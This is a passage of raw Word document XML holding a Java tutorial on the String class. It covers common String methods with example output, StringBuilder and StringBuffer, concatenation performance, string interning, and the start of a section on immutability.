    <w:p w14:paraId="59A1E0A6" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="522"/>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str.length()); // Output: 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32342A54" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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harAt(int index)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Returns the character at the specified index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1648B32F" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="522"/>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str.charAt(1)); // Output: e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0EBD4E" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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at(String str)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Concatenates the specified string to the original string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16815220" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="522"/>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str.concat(" World")); // Output: Hello World</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A38419B" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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quals(Object obj)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Compares the current string to another object (usually a string) to check for equality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B39C90C" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="522"/>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 str1 = "Hello";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E2C75F" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="522"/>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 str2 = "hello";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61076492" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="522"/>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str1.equals(str2)); // Output: false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AA25CE" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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qualsIgnoreCase(String str)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Compares two strings, ignoring case differences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617937D6" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="522"/>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str1.equalsIgnoreCase("hello")); // Output: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025FEB15" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ubstring(int beginIndex, int endIndex)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Returns a substring of the string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CA2C0B" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="522"/>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str.substring(0, 3)); // Output: Hel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B086A4E" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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oUpperCase()</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toLowerCase()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Converts the string to uppercase or lowercase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE307AF" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="522"/>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str.toUpperCase()); // Output: HELLO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAA73C7" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="522"/>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str.toLowerCase()); // Output: hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422883C4" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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rim()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Removes leading and trailing whitespace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2753D451" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="522"/>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 str3 = "   Hello   ";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5604E04C" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="522"/>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str3.trim()); // Output: Hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141D9848" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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place(CharSequence oldChar, CharSequence newChar)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Replaces all occurrences of a substring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E67BF5F" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="522"/>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str.replace("e", "a")); // Output: Hallo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2588B5" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A"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StringBuilder and StringBuffer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FA88DB"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ile the String class is immutable, there are other classes like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>StringBuilder</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StringBuffer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> which are mutable and allow modification of strings without creating new objects. These are generally used when performing many operations on strings to avoid creating too many objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D611233" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52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ringBuilder</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Not synchronized and thus faster than StringBuffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700403CB" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52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ringBuffer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Synchronized and thread-safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651277B5"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of StringBuilder:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1087496D"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Builder sb = new StringBuilder("Hello");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311898F0"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b.append(" World");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B00DD3"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sb.toString()); // Output: Hello World</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580F1AF0" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A"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Performance of String Concatenation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5689475F" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ing + operator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: String concatenation using + creates a new String object each time, which leads to memory overhead and is inefficient in a loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B83EDB6" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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 result = "Hello";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F435607" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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sult += " World";  // Inefficient for large concatenations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15482E93" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Using StringBuilder</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: More efficient as it modifies the string without creating new objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2F83B0" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Builder sb = new StringBuilder("Hello");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DBB8F2" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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b.append(" World");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72531D16" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A"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7. Interning of Strings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798FDAE3"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String class also has a special method </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>intern()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which can be used to return a canonical representation of the string. If the string is already in the string pool, it returns the existing string reference; otherwise, it adds the string to the pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECD2716"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F612AC5"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 str1 = "Hello";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB28EC0"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 str2 = new String("Hello").intern();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161B24A8"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str1 == str2); // Output: true (same reference)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5A10C2" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A"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Code Using String Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C41A024"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tringExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA971B9"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6B7CAE94"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str1 = "Java";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294264F2"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str2 = "Java";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73275115"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65E832C"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tring literal comparison (String Pool)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DB023B"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tr1 == str2); // true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F163B5" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="458ADB2A"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tring with new keyword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B06ADE0"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str3 = new String("Java");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A495F7D"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tr1 == str3); // false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE114A6" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04E22722"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Methods from String class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7303FC85"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str4 = " Hello, World! ";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFB6ADB"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tr4.trim()); // Output: Hello, World!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3F4D2B"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tr4.length()); // Output: 15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09803CF9"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tr4.substring(7, 12)); // Output: World</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AFC179"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tr4.toUpperCase()); // Output: HELLO, WORLD!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9E0E75"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tr4.replace("World", "Java")); // Output: Hello, Java!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669D6DA0"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0838C22" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A"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1A3DB9B" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A"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562C8852" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52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mmutable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Once a String is created, its value cannot be changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0576A8C7" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52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ring Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A pool to manage memory efficiently for String literals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34359EDA" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52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fficient String Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use StringBuilder or StringBuffer for concatenation and manipulation in a loop or frequent modification scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081BF2C1" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52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ide Range of Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: String provides a rich set of methods to perform various string operations like comparison, extraction, transformation, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAC0753" w14:textId="362C9B92" w:rsidR="00342FA5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0028064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CC5AA8D">
          <v:rect id="_x0000_i1230" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FA2971" w14:textId="4D9BDBA0" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="009308A9" w:rsidP="001C0DAC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="_Toc196307565"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a special feature of String</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p w14:paraId="0CA00AA6" w14:textId="32C2BC6C" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8" w:rsidP="00161B64">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special feature</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the String class in Java is its </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>immutability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This means that once a String object is created, its value cannot be changed. Here are the key aspects of this special feature:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C54570" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8"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Immutability of Strings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1505D04D" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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mmutability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> means that the state of a String object cannot be changed once it is created. Any operation that appears to modify a string actually creates a new String object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B14E222" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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provides several benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B33E2C2" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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 safety</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Multiple threads can safely share and use a String without synchronization, as it cannot be modified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608EECFD" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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curity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since String objects cannot be altered, they are more secure in contexts such as database queries, network communication, or as keys in hash maps, where their values must remain consistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66268ECF" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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erformance optimization</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
